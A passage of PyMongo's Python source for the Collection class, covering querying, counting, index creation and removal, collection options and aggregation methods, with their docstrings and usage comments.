Deprecated the option `modifiers`.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.0
Changed the parameter names `spec`, `fields`, `timeout`, and
`partial` to `filter`, `projection`, `no_cursor_timeout`, and
`allow_partial_results` respectively.
Added the `cursor_type`, `oplog_replay`, and `modifiers` options.
Removed the `network_timeout`, `read_preference`, `tag_sets`,
`secondary_acceptable_latency_ms`, `max_scan`, `snapshot`,
`tailable`, `await_data`, `exhaust`, `as_class`, and slave_okay
parameters. Removed `compile_re` option: PyMongo now always
represents BSON regular expressions as :class:`~bson.regex.Regex`
objects. Use :meth:`~bson.regex.Regex.try_compile` to attempt to
convert from a BSON regular expression to a Python regular
expression object. Soft deprecated the `manipulate` option.
.. versionchanged:: 2.7
Added `compile_re` option. If set to False, PyMongo represented BSON
regular expressions as :class:`~bson.regex.Regex` objects instead of
attempting to compile BSON regular expressions as Python native
regular expressions, thus preventing errors for some incompatible
patterns, see `PYTHON-500`_.
.. versionadded:: 2.3
The `tag_sets` and `secondary_acceptable_latency_ms` parameters.
.. _PYTHON-500: https://jira.mongodb.org/browse/PYTHON-500
.. mongodoc:: find
"""
return Cursor(self, *args, **kwargs)
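    # Usage sketch (comments only; assumes ``import pymongo`` and an existing
    # Collection ``coll`` -- the field names are illustrative):
    #
    #     cursor = coll.find({'status': 'active'},
    #                        projection={'_id': False},
    #                        sort=[('created', pymongo.DESCENDING)],
    #                        skip=10,
    #                        limit=5,
    #                        max_time_ms=2000)
    #     for doc in cursor:
    #         print(doc)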
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.find_raw_batches()
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: find_raw_batches does not support sessions.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"find_raw_batches does not support sessions")
return RawBatchCursor(self, *args, **kwargs)
def parallel_scan(self, num_cursors, session=None, **kwargs):
"""**DEPRECATED**: Scan this entire collection in parallel.
Returns a list of up to ``num_cursors`` cursors that can be iterated
concurrently. As long as the collection is not modified during
scanning, each document appears once in one of the cursors result
sets.
For example, to process each document in a collection using some
thread-safe ``process_document()`` function:
>>> def process_cursor(cursor):
... for document in cursor:
... # Some thread-safe processing function:
... process_document(document)
>>>
>>> # Get up to 4 cursors.
...
>>> cursors = collection.parallel_scan(4)
>>> threads = [
... threading.Thread(target=process_cursor, args=(cursor,))
... for cursor in cursors]
>>>
>>> for thread in threads:
... thread.start()
>>>
>>> for thread in threads:
... thread.join()
>>>
>>> # All documents have now been processed.
The :meth:`parallel_scan` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `num_cursors`: the number of cursors to return
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs`: additional options for the parallelCollectionScan
command can be passed as keyword arguments.
.. note:: Requires server version **>= 2.5.5**.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added back support for arbitrary keyword arguments. MongoDB 3.4
adds support for maxTimeMS as an option to the
parallelCollectionScan command.
.. versionchanged:: 3.0
Removed support for arbitrary keyword arguments, since
the parallelCollectionScan command has no optional arguments.
"""
warnings.warn("parallel_scan is deprecated. MongoDB 4.2 will remove "
"the parallelCollectionScan command.",
DeprecationWarning, stacklevel=2)
cmd = SON([('parallelCollectionScan', self.__name),
('numCursors', num_cursors)])
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
# We call sock_info.command here directly, instead of
# calling self._command to avoid using an implicit session.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
read_concern=self.read_concern,
parse_write_concern_error=True,
session=session,
client=self.__database.client)
cursors = []
for cursor in result['cursors']:
cursors.append(CommandCursor(
self, cursor['cursor'], sock_info.address,
session=session, explicit_session=session is not None))
return cursors
def _count(self, cmd, collation=None, session=None):
"""Internal count helper."""
with self._socket_for_reads(session) as (sock_info, slave_ok):
res = self._command(
sock_info,
cmd,
slave_ok,
allowable_errors=["ns missing"],
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
if res.get("errmsg", "") == "ns missing":
return 0
return int(res["n"])
def _aggregate_one_result(
self, sock_info, slave_ok, cmd, collation=None, session=None):
"""Internal helper to run an aggregate that returns a single result."""
result = self._command(
sock_info,
cmd,
slave_ok,
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
batch = result['cursor']['firstBatch']
return batch[0] if batch else None
def estimated_document_count(self, **kwargs):
"""Get an estimate of the number of documents in this collection using
collection metadata.
The :meth:`estimated_document_count` method is **not** supported in a
transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
:Parameters:
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
"""
if 'session' in kwargs:
raise ConfigurationError(
'estimated_document_count does not support sessions')
cmd = SON([('count', self.__name)])
cmd.update(kwargs)
return self._count(cmd)
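    # Usage sketch (comments; assumes an existing Collection ``coll``):
    #
    #     total = coll.estimated_document_count()              # metadata-based, fast
    #     total = coll.estimated_document_count(maxTimeMS=500)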
def count_documents(self, filter, session=None, **kwargs):
"""Count the number of documents in this collection.
The :meth:`count_documents` method is supported in a transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count.
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
This option is only supported on MongoDB 3.6 and above.
The :meth:`count_documents` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (required): A query document that selects which documents
to count in the collection. Can be an empty document to count all
documents.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
pipeline = [{'$match': filter}]
if 'skip' in kwargs:
pipeline.append({'$skip': kwargs.pop('skip')})
if 'limit' in kwargs:
pipeline.append({'$limit': kwargs.pop('limit')})
pipeline.append({'$group': {'_id': None, 'n': {'$sum': 1}}})
cmd = SON([('aggregate', self.__name),
('pipeline', pipeline),
('cursor', {})])
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
result = self._aggregate_one_result(
sock_info, slave_ok, cmd, collation, session)
if not result:
return 0
return result['n']
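    # Usage sketch (comments; assumes ``import pymongo`` and a Collection ``coll``
    # with an index on ``x`` -- names are illustrative):
    #
    #     n = coll.count_documents({'x': {'$gt': 0}})
    #     n = coll.count_documents({'x': {'$gt': 0}}, skip=5, limit=100,
    #                              hint=[('x', pymongo.ASCENDING)])
    #
    # Unlike estimated_document_count(), this runs the $match/$skip/$limit/$group
    # aggregation built above, so the result honors the filter exactly.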
def count(self, filter=None, session=None, **kwargs):
"""**DEPRECATED** - Get the number of documents in this collection.
The :meth:`count` method is deprecated and **not** supported in a
transaction. Please use :meth:`count_documents` or
:meth:`estimated_document_count` instead.
All optional count parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count.
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
The :meth:`count` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (optional): A query document that selects which documents
to count in the collection.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
warnings.warn("count is deprecated. Use estimated_document_count or "
"count_documents instead. Please note that $where must "
"be replaced by $expr, $near must be replaced by "
"$geoWithin with $center, and $nearSphere must be "
"replaced by $geoWithin with $centerSphere",
DeprecationWarning, stacklevel=2)
cmd = SON([("count", self.__name)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
return self._count(cmd, collation, session)
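    # Migration sketch (comments): rough equivalents for the deprecated count(),
    # assuming a Collection ``coll``:
    #
    #     coll.count()                        ->  coll.estimated_document_count()
    #     coll.count({'x': 1})                ->  coll.count_documents({'x': 1})
    #     coll.count({'$where': 'this.a > this.b'})
    #         ->  coll.count_documents({'$expr': {'$gt': ['$a', '$b']}})  # MongoDB 3.6+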
def create_indexes(self, indexes, session=None, **kwargs):
"""Create one or more indexes on this collection.
>>> from pymongo import IndexModel, ASCENDING, DESCENDING
>>> index1 = IndexModel([("hello", DESCENDING),
... ("world", ASCENDING)], name="hello_world")
>>> index2 = IndexModel([("goodbye", DESCENDING)])
>>> db.test.create_indexes([index1, index2])
["hello_world", "goodbye_-1"]
:Parameters:
- `indexes`: A list of :class:`~pymongo.operations.IndexModel`
instances.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: `create_indexes` uses the `createIndexes`_ command
introduced in MongoDB **2.6** and cannot be used with earlier
versions.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. versionadded:: 3.0
.. _createIndexes: https://docs.mongodb.com/manual/reference/command/createIndexes/
"""
common.validate_list('indexes', indexes)
names = []
with self._socket_for_writes() as sock_info:
supports_collations = sock_info.max_wire_version >= 5
def gen_indexes():
for index in indexes:
if not isinstance(index, IndexModel):
raise TypeError(
"%r is not an instance of "
"pymongo.operations.IndexModel" % (index,))
document = index.document
if "collation" in document and not supports_collations:
raise ConfigurationError(
"Must be connected to MongoDB "
"3.4+ to use collations.")
names.append(document["name"])
yield document
cmd = SON([('createIndexes', self.name),
('indexes', list(gen_indexes()))])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
return names
def __create_index(self, keys, index_options, session, **kwargs):
"""Internal create index helper.
:Parameters:
- `keys`: a list of tuples [(key, type), (key, type), ...]
- `index_options`: a dict of index options.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
"""
index_doc = helpers._index_document(keys)
index = {"key": index_doc}
collation = validate_collation_or_none(
index_options.pop('collation', None))
index.update(index_options)
with self._socket_for_writes() as sock_info:
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
else:
index['collation'] = collation
cmd = SON([('createIndexes', self.name), ('indexes', [index])])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
def create_index(self, keys, session=None, **kwargs):
"""Creates an index on this collection.
Takes either a single key or a list of (key, direction) pairs.
The key(s) must be an instance of :class:`basestring`
(:class:`str` in python 3), and the direction(s) must be one of
(:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`,
:data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`,
:data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`,
:data:`~pymongo.TEXT`).
To create a single key ascending index on the key ``'mike'`` we just
use a string argument::
>>> my_collection.create_index("mike")
For a compound index on ``'mike'`` descending and ``'eliot'``
ascending we need to use a list of tuples::
>>> my_collection.create_index([("mike", pymongo.DESCENDING),
... ("eliot", pymongo.ASCENDING)])
All optional index creation parameters should be passed as
keyword arguments to this method. For example::
>>> my_collection.create_index([("mike", pymongo.DESCENDING)],
... background=True)
Valid options include, but are not limited to:
- `name`: custom name to use for this index - if none is
given, a name will be generated.
- `unique`: if ``True`` creates a uniqueness constraint on the index.
- `background`: if ``True`` this index should be created in the
background.
- `sparse`: if ``True``, omit from the index any documents that lack
the indexed field.
- `bucketSize`: for use with geoHaystack indexes.
Number of documents to group together within a certain proximity
to a given longitude and latitude.
- `min`: minimum value for keys in a :data:`~pymongo.GEO2D`
index.
- `max`: maximum value for keys in a :data:`~pymongo.GEO2D`
index.
- `expireAfterSeconds`: <int> Used to create an expiring (TTL)
collection. MongoDB will automatically delete documents from
this collection after <int> seconds. The indexed field must
be a UTC datetime or the data will not expire.
- `partialFilterExpression`: A document that specifies a filter for
a partial index.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
See the MongoDB documentation for a full list of supported options by
server version.
.. warning:: `dropDups` is not supported by MongoDB 3.0 or newer. The
option is silently ignored by the server and unique index builds
using the option will fail if a duplicate value is detected.
.. note:: `partialFilterExpression` requires server version **>= 3.2**
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `keys`: a single key or a list of (key, direction)
pairs specifying the index to create
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): any additional index creation
options (see the above list) should be passed as keyword
arguments
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for passing maxTimeMS
in kwargs.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.2
Added partialFilterExpression to support partial indexes.
.. versionchanged:: 3.0
Renamed `key_or_list` to `keys`. Removed the `cache_for` option.
:meth:`create_index` no longer caches index names. Removed support
for the drop_dups and bucket_size aliases.
.. mongodoc:: indexes
"""
keys = helpers._index_list(keys)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
cmd_options = {}
if "maxTimeMS" in kwargs:
cmd_options["maxTimeMS"] = kwargs.pop("maxTimeMS")
self.__create_index(keys, kwargs, session, **cmd_options)
return name
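    # Usage sketch (comments; assumes ``import pymongo`` and a Collection ``coll``):
    #
    #     coll.create_index('username', unique=True)
    #     coll.create_index([('created', pymongo.ASCENDING)],
    #                       expireAfterSeconds=3600)   # TTL index on a UTC datetime field
    #     coll.create_index([('status', pymongo.ASCENDING)],
    #                       partialFilterExpression={'status': {'$exists': True}})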
def ensure_index(self, key_or_list, cache_for=300, **kwargs):
"""**DEPRECATED** - Ensures that an index exists on this collection.
.. versionchanged:: 3.0
**DEPRECATED**
"""
warnings.warn("ensure_index is deprecated. Use create_index instead.",
DeprecationWarning, stacklevel=2)
# The types supported by datetime.timedelta.
if not (isinstance(cache_for, integer_types) or
isinstance(cache_for, float)):
raise TypeError("cache_for must be an integer or float.")
if "drop_dups" in kwargs:
kwargs["dropDups"] = kwargs.pop("drop_dups")
if "bucket_size" in kwargs:
kwargs["bucketSize"] = kwargs.pop("bucket_size")
keys = helpers._index_list(key_or_list)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
# Note that there is a race condition here. One thread could
# check if the index is cached and be preempted before creating
# and caching the index. This means multiple threads attempting
# to create the same index concurrently could send the index
# to the server two or more times. This has no practical impact
# other than wasted round trips.
if not self.__database.client._cached(self.__database.name,
self.__name, name):
self.__create_index(keys, kwargs, session=None)
self.__database.client._cache_index(self.__database.name,
self.__name, name, cache_for)
return name
return None
def drop_indexes(self, session=None, **kwargs):
"""Drops all indexes on this collection.
Can be used on non-existent collections or collections with no indexes.
Raises OperationFailure on an error.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the dropIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
self.__database.client._purge_index(self.__database.name, self.__name)
self.drop_index("*", session=session, **kwargs)
def drop_index(self, index_or_name, session=None, **kwargs):
"""Drops the specified index on this collection.
Can be used on non-existent collections or collections with no
indexes. Raises OperationFailure on an error (e.g. trying to
drop an index that does not exist). `index_or_name`
can be either an index name (as returned by `create_index`),
or an index specifier (as passed to `create_index`). An index
specifier should be a list of (key, direction) pairs. Raises
TypeError if index is not an instance of (str, unicode, list).
.. warning::
if a custom name was used on index creation (by
passing the `name` parameter to :meth:`create_index` or
:meth:`ensure_index`) the index **must** be dropped by name.
:Parameters:
- `index_or_name`: index (or name of index) to drop
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the dropIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
name = index_or_name
if isinstance(index_or_name, list):
name = helpers._gen_index_name(index_or_name)
if not isinstance(name, string_type):
raise TypeError("index_or_name must be an index name or list")
self.__database.client._purge_index(
self.__database.name, self.__name, name)
cmd = SON([("dropIndexes", self.__name), ("index", name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
self._command(sock_info,
cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=["ns not found"],
write_concern=self._write_concern_for(session),
session=session)
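    # Usage sketch (comments; assumes ``import pymongo`` and a Collection ``coll``):
    #
    #     name = coll.create_index([('mike', pymongo.DESCENDING)])
    #     coll.drop_index(name)                               # drop by name
    #     coll.drop_index([('mike', pymongo.DESCENDING)])     # or by the same specifier
    #
    # Indexes created with a custom ``name`` must be dropped by that name.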
def reindex(self, session=None, **kwargs):
"""Rebuilds all indexes on this collection.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the reIndex
command (like maxTimeMS) can be passed as keyword arguments.
.. warning:: reindex blocks all other operations (indexes
are built in the foreground) and will be slow for large
collections.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.5
We no longer apply this collection's write concern to this operation.
MongoDB 3.4 silently ignored the write concern. MongoDB 3.6+ returns
an error if we include the write concern.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
cmd = SON([("reIndex", self.__name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
return self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
session=session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection.
>>> for index in db.test.list_indexes():
... print(index)
...
SON([(u'v', 1), (u'key', SON([(u'_id', 1)])),
(u'name', u'_id_'), (u'ns', u'test.test')])
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.command_cursor.CommandCursor`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionadded:: 3.0
"""
codec_options = CodecOptions(SON)
coll = self.with_options(codec_options=codec_options,
read_preference=ReadPreference.PRIMARY)
sock_ctx, read_pref = self._socket_for_primary_reads(session)
with sock_ctx as (sock_info, slave_ok):
cmd = SON([("listIndexes", self.__name), ("cursor", {})])
if sock_info.max_wire_version > 2:
with self.__database.client._tmp_session(session, False) as s:
try:
cursor = self._command(sock_info, cmd, slave_ok,
read_pref,
codec_options,
session=s)["cursor"]
except OperationFailure as exc:
# Ignore NamespaceNotFound errors to match the behavior
# of reading from *.system.indexes.
if exc.code != 26:
raise
cursor = {'id': 0, 'firstBatch': []}
return CommandCursor(coll, cursor, sock_info.address,
session=s,
explicit_session=session is not None)
else:
res = message._first_batch(
sock_info, self.__database.name, "system.indexes",
{"ns": self.__full_name}, 0, slave_ok, codec_options,
read_pref, cmd,
self.database.client._event_listeners)
cursor = res["cursor"]
# Note that a collection can only have 64 indexes, so there
# will never be a getMore call.
return CommandCursor(coll, cursor, sock_info.address)
def index_information(self, session=None):
"""Get information on this collection's indexes.
Returns a dictionary where the keys are index names (as
returned by create_index()) and the values are dictionaries
containing information about each index. The dictionary is
guaranteed to contain at least a single key, ``"key"`` which
is a list of (key, direction) pairs specifying the index (as
passed to create_index()). It will also contain any other
metadata about the indexes, except for the ``"ns"`` and
``"name"`` keys, which are cleaned. Example output might look
like this:
>>> db.test.create_index("x", unique=True)
u'x_1'
>>> db.test.index_information()
{u'_id_': {u'key': [(u'_id', 1)]},
u'x_1': {u'unique': True, u'key': [(u'x', 1)]}}
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
cursor = self.list_indexes(session=session)
info = {}
for index in cursor:
index["key"] = index["key"].items()
index = dict(index)
info[index.pop("name")] = index
return info
def options(self, session=None):
"""Get the options set on this collection.
Returns a dictionary of options and their values - see
:meth:`~pymongo.database.Database.create_collection` for more
information on the possible options. Returns an empty
dictionary if the collection has not been created yet.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
cursor = dbo.list_collections(
session=session, filter={"name": self.__name})
result = None
for doc in cursor:
result = doc
break
if not result:
return {}
options = result.get("options", {})
if "create" in options:
del options["create"]
return options
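    # Usage sketch (comments; ``db`` is an illustrative Database instance):
    #
    #     db.create_collection('log', capped=True, size=2 ** 20)
    #     db.log.options()       # e.g. {'capped': True, 'size': 1048576}
    #     db.missing.options()   # {} -- collection has not been created yet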
def _aggregate(self, pipeline, cursor_class, first_batch_size, session,
explicit_session, **kwargs):
common.validate_list('pipeline', pipeline)
if "explain" in kwargs:
raise ConfigurationError("The explain option is not supported. "
"Use Database.command instead.")
collation = validate_collation_or_none(kwargs.pop('collation', None))
max_await_time_ms = kwargs.pop('maxAwaitTimeMS', None)
cmd = SON([("aggregate", self.__name),
("pipeline", pipeline)])
# Remove things that are not command options.
use_cursor = True
if "useCursor" in kwargs:
warnings.warn(
"The useCursor option is deprecated "
"and will be removed in PyMongo 4.0",
DeprecationWarning, stacklevel=2)
use_cursor = common.validate_boolean(
"useCursor", kwargs.pop("useCursor"))
batch_size = common.validate_non_negative_integer_or_none(
"batchSize", kwargs.pop("batchSize", None))
# If the server does not support the "cursor" option we
# ignore useCursor and batchSize.
with self._socket_for_reads(session) as (sock_info, slave_ok):
dollar_out = pipeline and '$out' in pipeline[-1]
if use_cursor:
if "cursor" not in kwargs:
kwargs["cursor"] = {}
# Ignore batchSize when the $out pipeline stage is used.
# batchSize is meaningless in that case since the server
# doesn't return results. This also avoids SERVER-23923.
if first_batch_size is not None and not dollar_out:
kwargs["cursor"]["batchSize"] = first_batch_size
cmd.update(kwargs)
# Apply this Collection's read concern if $out is not in the
# pipeline.
if (sock_info.max_wire_version >= 4
and 'readConcern' not in cmd
and not dollar_out):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and dollar_out:
write_concern = self._write_concern_for(session)
else:
write_concern = None
# Avoid auto-injecting a session: aggregate() passes a session,
# aggregate_raw_batches() passes none.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
parse_write_concern_error=True,
read_concern=read_concern,
write_concern=write_concern,
collation=collation,
session=session,
client=self.__database.client)
if "cursor" in result:
cursor = result["cursor"]
else:
# Pre-MongoDB 2.6 or unacknowledged write. Fake a cursor.
cursor = {
"id": 0,
"firstBatch": result.get("result", []),
"ns": self.full_name,
}
return cursor_class(
self, cursor, sock_info.address,
batch_size=batch_size or 0,
max_await_time_ms=max_await_time_ms,
session=session, explicit_session=explicit_session)
def aggregate(self, pipeline, session=None, **kwargs):
"""Perform an aggregation using the aggregation framework on this
collection.
All optional `aggregate command`_ parameters should be passed as
keyword arguments to this method. Valid options include, but are not
limited to:
- `allowDiskUse` (bool): Enables writing to temporary files. When set
to True, aggregation stages can write data to the _tmp subdirectory
of the --dbpath directory. The default is False.
- `maxTimeMS` (int): The maximum amount of time to allow the operation
to run in milliseconds.
- `batchSize` (int): The maximum number of documents to return per
batch. Ignored if the connected mongod or mongos does not support
returning aggregate results using a cursor, or `useCursor` is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `useCursor` (bool): Deprecated. Will be removed in PyMongo 4.0.
The :meth:`aggregate` method obeys the :attr:`read_preference` of this
:class:`Collection`. Please note that using the ``$out`` pipeline stage
requires a read preference of
:attr:`~pymongo.read_preferences.ReadPreference.PRIMARY` (the default).
The server will raise an error if the ``$out`` pipeline stage is used
with any other read preference.
.. note:: This method does not support the 'explain' option. Please
use :meth:`~pymongo.database.Database.command` instead. An
example is included in the :ref:`aggregate-examples` documentation.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `pipeline`: a list of aggregation pipeline stages
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
:Returns:
A :class:`~pymongo.command_cursor.CommandCursor` over the result
set.
.. versionchanged:: 3.6
Added the `session` parameter. Added the `maxAwaitTimeMS` option.
Deprecated the `useCursor` option.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.0
The :meth:`aggregate` method always returns a CommandCursor. The
pipeline argument must be a list.
.. versionchanged:: 2.7
When the cursor option is used, return
:class:`~pymongo.command_cursor.CommandCursor` instead of
:class:`~pymongo.cursor.Cursor`.
.. versionchanged:: 2.6
Added cursor support.
.. versionadded:: 2.3
.. seealso:: :doc:`/examples/aggregation`
.. _aggregate command:
https://docs.mongodb.com/manual/reference/command/aggregate
"""
with self.__database.client._tmp_session(session, close=False) as s:
return self._aggregate(pipeline,
CommandCursor,
kwargs.get('batchSize'),
session=s,
explicit_session=session is not None,
**kwargs)
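    # Usage sketch (comments; the pipeline and field names are illustrative):
    #
    #     pipeline = [
    #         {'$match': {'status': 'active'}},
    #         {'$group': {'_id': '$city', 'total': {'$sum': '$amount'}}},
    #         {'$sort': {'total': -1}},
    #     ]
    #     for doc in coll.aggregate(pipeline, allowDiskUse=True, maxTimeMS=5000):
    #         print(doc)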
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.aggregate_raw_batches([
... {'$project': {'x': {'$multiply': [2, '$x']}}}])
>>> for batch in cursor:
... print(bson.decode_all(batch))
